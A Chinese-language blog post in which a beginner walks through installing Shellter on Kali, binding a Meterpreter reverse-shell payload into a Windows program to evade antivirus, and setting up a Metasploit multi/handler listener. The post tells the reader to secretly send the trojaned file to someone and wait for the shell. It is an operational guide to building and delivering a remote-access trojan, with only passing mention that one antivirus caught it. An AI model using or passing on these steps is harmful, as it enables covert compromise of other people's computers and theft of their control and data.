记录一下shellter 使用

  今天在春秋的视频上看到了kali一款工具的使用  shellter

  看大佬的视频学习的  这是他整理的  https://bbs.ichunqiu.com/thread-25177-1-1.html 最好还是去这看

  首先先说一下 怎么安装这个工具(我用的是kali 2018版本),这个版本反正是没有这个软件,需要自己安装。

安装命令也和平常一样,apt install shellter

当然 也可以在下面的网址,下载。zip的解压命令 unzip 你的zip包

https://www.shellterproject.com/

  不过我在第一次安装这个工具的时候,刚开始提示了错误,什么wine32啥的 。如果提示,把这个也安装上。apt install wine32

然后在kali  直接敲命令 shellter 就OK了。

 在来说说这款工具,是一个免杀的木马捆绑软件。(不过自己做了一次,360直接给杀了,准备在多详细了解一下这个工具,看看是不是真的可以做到免杀)。然后配合msf使用。

  在来说一下工具的使用,首先进入这个工具。

 

这个界面 A 代表自动 M 是高级的用法,也应该是用M来做到免杀吧,自己还没有试。 H 也就是帮助了

身为一个小白,当然果断选A。

会有PE 这个 就是你要捆绑的文件目录

我的就在root下 /root/你要捆绑的软件。

输入完毕 回车 等一会 因为他在捆绑,生成东西这个过程。

输入Y 隐身

这时会问你选择哪种方式,

Meterpreter_Reverse_TCP   这种是基于TCP的反向链接,换句话说,谁出发了这个模块,她会吧这个触发者的shell发送给指定的人
Meterpreter_Reverse_HTTP  这个是基于 http网页传输的反向链接   和上面大同小异,只不过 上面的基于TCP链接,这个是用GET  或者 POST进行发送接收
Meterpreter_Reverse_HTTPS  这个  和上面的也差不多,只不过这个的数据被加密,也是基于http的传输方式

Meterpreter_Bind_TCP  这个就不同了,这个是正向的链接,需要攻击者知道,是谁出发的这个模块,比较类似后门程序,

Shell_Reverse_TCP 和上面相同,也是反向链接,只不过可以用shell直接接收会话。(此处是在别人那拿过来的,我也是看着他的视频学习的  i春秋  屌丝绅士 大佬)。


这是根据选的什么方式,来自己填IP 和端口。端口随意,只要是没用的。然后等一会 回车 就做完了。就该把你的这个文件偷偷给某个人,来试一试你的成果了。

接下来的步骤就不截图了 把命令写一下。

用到MSF

use expolit/multi/handler

set payload windows/meterpreter/reverse_tcp   之前的工具 我选的是第一个  reverse—tcp。所以在最后这个地方选自己对应的。

set LHOST 你目标的IP

set LPORT 你在工具中设置的端口

设置完这三个  exploit

监听 等着别人用你捆绑的软件。接会有提示。




  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值